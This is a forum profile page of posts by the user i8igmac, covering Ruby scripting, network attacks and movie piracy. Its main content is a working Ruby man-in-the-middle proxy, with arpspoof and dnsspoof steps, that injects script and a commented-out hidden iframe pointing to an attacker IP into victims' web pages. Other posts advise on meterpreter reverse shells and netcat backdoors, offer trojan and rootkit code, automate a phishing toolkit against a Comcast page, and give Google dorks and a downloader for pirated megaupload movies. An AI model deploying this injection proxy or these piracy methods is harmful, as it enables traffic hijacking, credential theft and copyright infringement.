Posts posted by i8igmac
-
This is one of those questions that come up all the time...
Your MAC address and local IP are not displayed across the internet.
If you're on a public wifi then I see no reason to worry about downloads...
-
I appreciate your response... I would like to share a dictionary I built for LFI scanning... I use some Google dorks to build it...
255 possible files...
-
Now this is just an example, I'm looking for help on building a list or a dictionary.
I have built a few scanners and crawlers, and I have an idea... I'm sure it's already been done but I like to do things my way...
Let's say you use wget to crawl and download an entire site; now you have all the contents downloaded into a tmp directory, then use a Linux command like grep (just for example) to find a string...
cat /tmp/site_crawl/* | grep exec
echo exec(var)
echo pcntl_exec(var)
...
Example of a list I would like to build...
passthru
system
exec
pcntl_exec
`` (backtick operator)
I'm looking for a universal list for finding ALL possibilities, not just PHP... I guess the goal is to find a way to execute or write data on the server...
Maybe there are vulnerabilities for CSS, Java, PHP etc... any string that may need further investigation...
This is just an example, I'm sure you will never find any PHP exec etc. in plain text...
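A defender-side version of that grep, as an added example (not code from the post): a Ruby script that audits PHP source for the command-execution sinks listed above, including the backtick operator, and skips commented-out calls. The SINKS list, the directory layout and the sample PHP are assumptions.

```ruby
# Added example: audit PHP source for command-execution sinks.
# SINKS starts from the functions named in the post plus a few well-known ones.
SINKS = %w[exec passthru system shell_exec pcntl_exec popen proc_open]

# A sink name followed by "(" that is not the tail of a longer identifier
# (so exec_helper( or my_system( are not reported).
SINK_RE = /(?<![\w$])(#{SINKS.join('|')})\s*\(/
BACKTICK_RE = /`[^`]*`/

# Drop PHP single-line comments (// and #) so commented-out calls are ignored.
# Deliberately simple: it does not understand string literals containing "//".
def strip_comment(line)
  line.sub(%r{(//|#).*$}, '')
end

# Returns [[line_number, sink_name], ...] for every suspicious call in `source`.
def find_sinks(source)
  hits = []
  source.each_line.with_index(1) do |raw, n|
    line = strip_comment(raw)
    line.scan(SINK_RE) { |(name)| hits << [n, name] }
    hits << [n, 'backtick'] if line =~ BACKTICK_RE
  end
  hits
end

# Walk a crawled tree (e.g. /tmp/site_crawl from wget) and report file:line: sink.
def scan_dir(dir)
  Dir.glob(File.join(dir, '**', '*.{php,phtml,inc}')).flat_map do |path|
    find_sinks(File.read(path)).map { |n, name| "#{path}:#{n}: #{name}" }
  end
end

# Constructed sample input so the script runs stand-alone.
SAMPLE = <<~'PHP'
  <?php
  $out = shell_exec("ls " . $_GET['dir']);   // user input reaches a shell
  // system("id");  commented out, should not be reported
  $v = `whoami`;
  echo exec_helper($x);                     // not a sink: longer identifier
  pcntl_exec("/bin/ls");
PHP

if __FILE__ == $0
  find_sinks(SAMPLE).each { |n, name| puts "sample.php:#{n}: #{name}" }
end
```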
-
I am also looking to start from the bottom; I'm looking into certs: A+, Sec+, Net+.
I would also like some advice; if I could get my foot in the door I feel I would succeed...
-
I have made a tool that will mass download from megaupload, a huge time saver. There are no captcha images (security image) so this makes my script simple...
As a paid user my tool could download 200 files at a time, or as a free user 1 at a time with a 30 second wait time...
Another feature is a Google crawl to find whatever file you're looking for and whether the links are still working...
Here is a tip, can be used with other file shares
Google search:
Inurl:"forum" intext:"megaupload.com/?d=" intext:"movie-file-name-year-2012" blueray
-
-
Hollywood sort of falsely advertises 'hacking'.
This is a big reason why I spent endless hours learning.
"What is a cookie virus?" From the 1995 movie Hackers: a cookie scrolls across the screen and supposedly eats up memory... A cookie is used when your web browser logs into a server; this cookie could be sniffed or stolen and give a hacker access to these websites.
This was my first question ;p
-
I have updated the above script: when the string "<head>" is found, the script inserts a small hello world script right after it and modifies the Content-Length of the current packet to make room for the extra data...
All pages load properly and now I feel successful.
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 P3P: CP="Facebook Set-Cookie: _e_0xIM_4=deleted X-Cnection: close Date: Fri, 13 Jan 2012 02:58:17 GMT Content-Length: 110 <html><head><title></title></head><body><span id="fbEmuTrackingSuccess">Success</span></body></html>
Only if the packet includes "Content-Length:" AND the desired string "<head>" will the exploit be inserted...
I have tried searching for other strings like <script> <head> <body> etc... they all produce the same results.
The problem is, what if none of these exist? Then no pages will be modified...
What if there are several packets responding to one GET request that match up with my desired algorithm? Then there may be 10 exploits inserted on one page...
-
For testing, set your browser's proxy settings to port 80... my goal is to have all pages modified and still load perfectly...
My last test script:
require 'eventmachine' attacker_ip="192.168.1.136" victim="192.168.1.110" gateway="192.168.1.1" dns = File.open("dns", "w+") dns.write("#{attacker_ip} *.*")# this is your ip, dns.close #"1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 ".split(/ /, 10).join # # set proxy settings in firefox to port 80 # uncommment these lines when you want to use arpsoof/dns #`pkill spoof` #a=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{victim} #{gateway}'"} #c=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{gateway} #{victim}'"} #b=Thread.new{system"xterm -e 'dnsspoof -i wlan0 -f dns'"} #a.run #b.run #c.run Thread.start{ class Client < EM::Connection def initialize(other, finger, *args, &blk) @other, @finger = other, finger super(*args, &blk) end def post_init send_data @finger.sub("Accept-Encoding:","Assept-Ensoding:") end def receive_data(response) clength = response.scan(/Content-Length: \d+/).to_s.sub("Content-Length: ","") #clength = response.scan(/Content-Length: \d+/).to_s.split.slice(1).to_i #+ 17 #puts clength = response.scan(/Content-Length: \d+/) #puts clength #print "\n" if response.scan("Content-Length: ").to_s == "" #&& response.scan("<body>").to_s == "" @other.send_data response else if response.scan("<head>").to_s == "" @other.send_data response else exploit="<script>alert('hello world')</script>" math=exploit.length puts response #@other.send_data response.sub("</title>","</titlE>\n<iframe src='http://192.168.1.103:8181/lol' width='0' height='0' </iframe>\n").sub("Content-Length: #{clength}","Content-Length: #{clength-clength}") #@other.send_data response.sub("</title>","</titlE><script>alert('hellow world')</script>").sub("Content-Length: #{clength}","Content-Length: #{clength-clength}") @other.send_data response.sub("<head>","<head>#{exploit}").sub("Content-Length: #{clength}","Content-Length: #{clength.to_i+math}") # .split(/ /, 9).join delete 9 blank spaces end end end end #browser open to http://192.168.1.114 module EchoServer def receive_data(finger) #finger 
is the header recived from the client, could log these cookies or log these pages #host = finger.to_a[1].chomp[6..-1] #host = finger.gsub(" ","").split[1].chomp[5..-1] #Thread.start{ ping = finger.gsub(" ","").index("Host:") pong = finger.gsub(" ","").index("\n",ping) host = finger.gsub(" ","")[ping..pong].gsub("Host:","").chomp #i dont know if this will prevent loading from cache data=finger.sub("If-None-Match:","If-None-MutXX:").sub("If-Modified-Since:","If-Modified-SXnce:") #print finger #puts host EventMachine::connect host, 80, Client, self, data # ask google for data end end } EventMachine::run { EventMachine::start_server attacker_ip, 80, EchoServer } # YOUR IP
-
Your meterpreter payload, is it reverse TCP? If so then you need to forward one more port to your BT5 machine; by default meterpreter uses port 4444.
I don't see why port forwarding is a bad idea.
Here is a tip for monitoring connections; works with Linux or Windows, on Windows you may need to run cmd as administrator:
netstat -np
-
I would like to share a script I put together about a year ago... it was a lot of fun building and there are so many other directions I could go with this script...
It's a little hard to explain but here goes...
First thing is starting up your arpspoof/dnsspoof and listening for traffic on port 80:
(victim GET /facebook/ with user123 cookies) ---> (evil-proxy GET /facebook/ with user123 cookies) ---> (facebook.com) --> response (evil-proxy MODIFY DATA) ---> response (victim)
I'm working on a few problems right now: when you add bytes to the packet you have to change the frame length or else the page will load in the victim's browser with incomplete code (the bottom half is missing).
I think I just figured it out... Total length is 1500 or '05 dc'
0000 00 15 00 48 8f c5 00 1a 73 91 01 9c 08 00 45 00 ...H.... s.....E.
0010 05 dc a4 d9 40 00 40 06 0b fc c0 a8 01 88 c0 a8 ....@.@. ........
With some math I'll have to change this value.
But here... give this a try...
Install Ruby with eventmachine...
Close any application that has port 80 already in use.
-
I have done a lot of testing with MITM attacks; I have tested all the tools mentioned in the video and many more...
My goal was to insert malicious code into 100% of HTTP TCP protocol traffic; a good proof of concept or control point could be as simple as the use of an <iframe src="evil.com">.
With all my testing, the most effective setup was DNS spoofing all the traffic to my own Ruby proxy running on port 66 that would modify the header fields, insert my evil code and send the packet to the client...
I could never get 100% efficiency... but my lab setup was limited...
-
These kinds of tasks are fun to automate yourself... I have made a Ruby script to find all movie files, delete duplicates, move all to another location and then delete the original location...
*.mkv *.avi *.iso
-
Install irb on your droid. It's just a quick scanner I use for discovering services on my network... When I need to find my FTP server or RDP... No need to root your device...
Example: nmap -p 135,139,445,5900,8080,80,21,22 192.168.1.1-255
require 'socket'

# one connect attempt per host/port in its own thread; "e" means the connect failed
Thread.start {
  for ip in 1..255
    for port in [135, 139, 445, 5900, 80, 8080, 21, 22]
      # pass ip/port into the thread so it does not read the loop variables after they change
      Thread.start(ip, port) { |i, p|
        begin
          t = TCPSocket.open("192.168.1.#{i}", p)
        rescue
          print "e"
        else
          t.close
          puts ""
          puts "#{i}:#{p} open ports!!!"
        end
      }
      sleep 0.1
    end
  end
}
Notes: if it crashes irb, set the sleep to 0.2 or higher. Your phone is limited on threads.
The IP address must look like this*
"192.169.1.#{ip.to_s} "
"192.168.#{ip.to_s}.1"
"xxx.#{ip.to_s}.x.x"
"#{ip.to_s}.66.66.66"
You can add more ports,
-
http://www.tutorialspoint.com/ruby/ruby_sending_email.htm
You can find these examples in almost any language, I like ruby so here is how I would do it.
I could maybe write something tonight. This will get you started
-
I think my solid state hard drive crashed... so I just booted up from a live CD and tried to mount the hard drive and got this error:
Message from syslogd@mint at Oct 24 20:28:07 ... kernel:[ 135.498149] Oops: 0000 [#1] SMP
Message from syslogd@mint at Oct 24 20:28:07 ... kernel:[ 135.498151] last sysfs file: /sys/module/crc16/initstate
Message from syslogd@mint at Oct 24 20:28:07 ... kernel:[ 135.498194] Process mount (pid: 3176, ti=f3562000 task=f656a640 task.ti=f3562000)
Message from syslogd@mint at Oct 24 20:28:07 ... kernel:[ 135.498195] Stack:
Message from syslogd@mint at Oct 24 20:28:07 ... kernel:[ 135.498204] Call Trace:
Message from syslogd@mint at Oct 24 20:28:07 ... kernel:[ 135.498276] Code: 5b 5e 5f 5d c3 55 57 89 c7 56 53 e8 42 d6 12 00 8b 5f 04 83 c9 ff 8b 77 08 8b 2d b4 97 27 c1 eb 12 8b 14 8d f0 9c 3b c1 8b 47 14 <8b> 04 10 99 01 c3 11 d6 41 ba 20 00 00 00 89 e8 e8 aa 48 ff ff
Message from syslogd@mint at Oct 24 20:28:07 ... kernel:[ 135.498290] EIP: [<c1140649>] __percpu_counter_sum+0x26/0x50 SS:ESP 0068:f3563d20
Message from syslogd@mint at Oct 24 20:28:07 ... kernel:[ 135.498292] CR2: 0000000001bee000
-
Any tips on increasing traffic? I'm clueless!
-
I'm looking to start my own forum; there are a few questions I have. I would like to start with a server from home but I'm not sure how to get traffic... what services would you recommend? I have read a little bit on meta tags but read this is no promise to bring traffic, so maybe I could see some examples of how you have used meta tags to increase traffic on your site...
I have my own tools I code with Ruby to perform small useful tasks for the site, so if I manage to get a forum up and fully functional I would then pay for a premium service, but are there any that include Ruby?
-
I have built a lot of my own client tools with Ruby to perform small automated tasks, for example HTTP, FTP, SSH...
I used to host public servers for games like Warcraft 3 and Counter-Strike... I would like to build a client to connect to one of my servers to say "hello world":
require 'socket'
# the strings below are placeholders for the bytes seen in Wireshark
server = TCPSocket.open("192.168.1.109", 6113)
server.puts("data.needed.to.establish.connection")
server.recv(1024)   # recv needs a maximum length
server.puts("data.needed.to.look.as.legit.client")
server.recv(1024)
server.puts("and more data")
server.recv(1024)
server.puts("hello to all people in the public server")
server.recv(1024)
server.close
exit
What I have done so far...
I'll start up Wireshark to start a live capture, then with my game client I'll connect to the server... now I'm trying to duplicate in Ruby what I see in Wireshark...
Is there an easy way to build a tool with this data I see in Wireshark??? Anyone have experience with this?
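An added example (not the poster's code) for the Wireshark question: a helper that converts bytes copied out of a Wireshark hex dump into a Ruby binary string, plus a send/receive helper with a timeout, so captured packets can be replayed against your own server. The CAPTURE bytes, host and port are constructed placeholders, not a real game protocol.

```ruby
require 'socket'

# Convert bytes copied from Wireshark into a binary String. Accepts the
# "hex dump" layout (offset column, hex bytes, optional ASCII column) and a
# bare hex stream such as "aabbccdd". A two-letter ASCII word that is also
# valid hex (e.g. "ab") would be misread as a byte; rare, but worth knowing.
def hexdump_to_bytes(dump)
  hex = dump.each_line.flat_map { |line|
    toks = line.split
    # drop the leading offset column ("0000", "0010", ...) when other tokens follow
    toks.shift if toks.size > 1 && toks.first =~ /\A[0-9a-f]{4,8}\z/i
    # keep byte tokens until the first non-hex token (the ASCII column)
    toks.take_while { |t| t =~ /\A(?:[0-9a-f]{2})+\z/i }
  }.join
  [hex].pack('H*')
end

# Send one payload and collect whatever arrives until `wait` seconds of quiet.
def exchange(sock, payload, wait: 2)
  sock.write(payload)
  reply = String.new                      # ASCII-8BIT buffer
  while IO.select([sock], nil, nil, wait)
    chunk = sock.read_nonblock(4096, exception: false)
    break if chunk.nil?                   # peer closed the connection
    reply << chunk unless chunk == :wait_readable
  end
  reply
end

# Connect, replay each captured packet in order, return the replies.
def replay(host, port, dumps)
  sock = TCPSocket.new(host, port)
  replies = dumps.map { |d| exchange(sock, hexdump_to_bytes(d)) }
  sock.close
  replies
end

# Constructed sample capture (not a real protocol), in send order: one line in
# Wireshark's hex dump layout, one with only an offset, one bare hex stream.
CAPTURE = [
  "0000  01 00 00 00 36 38 58 49   50 58 32 44 00 00 00 00   ....68XIPX2D....",
  "0010 ff ee dd cc",
  "aabbccdd",
]

if __FILE__ == $0 && ARGV.size == 2       # usage: ruby replay.rb 192.168.1.109 6113
  p replay(ARGV[0], ARGV[1].to_i, CAPTURE)
end
```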
-
A basic understanding of how server and client software work, I think, would be a good start... for example install your first FTP server and properly configure your router, then have a friend from outside your home network download some files from your first FTP server...
Google 'ftp server install tutorial'
Google 'ftp server port forwarding'
Google 'ftp client tutorial'
Once you understand the difference between a client and a server, things will make sense later on... (expression: crawl before you walk)
I would pick a scripting language like Perl/Python/Ruby... (RUBY!!!) I would go with Ruby; I have a lot of fun working with sockets, learning how 2 computers communicate over the internet is very interesting and fun to learn... I could show you Ruby example code for trojan/malware/rootkit, always lots of fun coding these!
Get yourself 2 computers at home and practice with netcat.exe (google netcat backdoor tutorial), you would have fun with this...
-
I thought I would share a quick example. I'm not sure what it is you want... you could accomplish anything with other scripting (learn Ruby!!!)
Save autoset.txt and execute this Ruby script as root; SET needs root privileges.
## autoset.txt
2 1 2 xfinity.comcast.net/constantguard/Alerts/ 2 2 666 no 777
# sudo ruby script.rb
# `date`[0..2] returns "Mon" (capitalised), so comparing it to "mon" never matched; use the weekday name directly
if Time.now.strftime("%a") == "Mon"  # Monday
  puts "lets do something"
  Thread.new { system("xterm -e './set-automate autoset.txt'") }
else
  puts "today is not Monday!"
end
-
http://www.microsoft.com/technet/security/bulletin/MS10-090.mspx
Check out the metasploit module Ms10-09
This one is extremely popular right now
Look at the exploit source code.
-
(inurl:"forum" intext:"Lincoln Lawyer" intext:"megaupload.com/?d")
I'm looking for advice on improving this Google search.
If you view Google with that search, you will find a working link a few pages into the search (enjoy ,-P)
Google outputs something like this:
The.Lincoln.Lawyer.DVDRip.XviD-TARGET
ideees.xxx/forum/index.php?topic=376590.0 - Cached
You +1'd this publicly. Undo
Jul 1, 2011 – The Lincoln Lawyer (2011) Retail Date ..|.. 12-07-2011. Release Date ..|.. 28-06-2011. Source ..|. ... hxxp://xxx.megaupload.com/?d=1C02NXIN ...
I'm looking for help on increasing the size of the response Google gives me, the 3 dots after the link! Maybe I can modify the search to give all links that include megaupload... any tips that would give me better results, please share.
The.Lincoln.Lawyer.DVDRip.XviD-TARGET
ideees.xxx/forum/index.php?topic=376590.0 - Cached
You +1'd this publicly. Undo
Jul 1, 2011 – The Lincoln Lawyer (2011) Retail Date ..|
hxxp://megaupload.com/?d123451
hxxp://megaupload.com/?d123452
hxxp://megaupload.com/?d123453
hxxp://megaupload.com/?d123454
hxxp://megaupload.com/?d123455
hxxp://megaupload.com/?d123456
hxxp://megaupload.com/?d123457
I made a script that will process each link one at a time (as a free user) through Ruby sockets.
The time it takes searching through that Google response manually is time consuming... a search function will complete my script 8-X
automation, trailer.mp4 download from imdb.com
I have an organized list of movies; I have automated movie cover download, actor image download and the movie description document...
I'm compiling this info into a website running on localhost. The most important feature is the trailer src, which I struggle to automate the download of... Omdb provides a very nice trailer that I hope to download OR just use the page/script source...
I can engineer a proper GET request for a single download but I notice it's not a consistent src location...
If someone can look at the page src of an IMDb trailer. I don't have the JavaScript skill to defeat the security they use to try to prevent this...
I'm open for ideas; iframe src could be the main page but this is sloppy and I want to isolate the video only....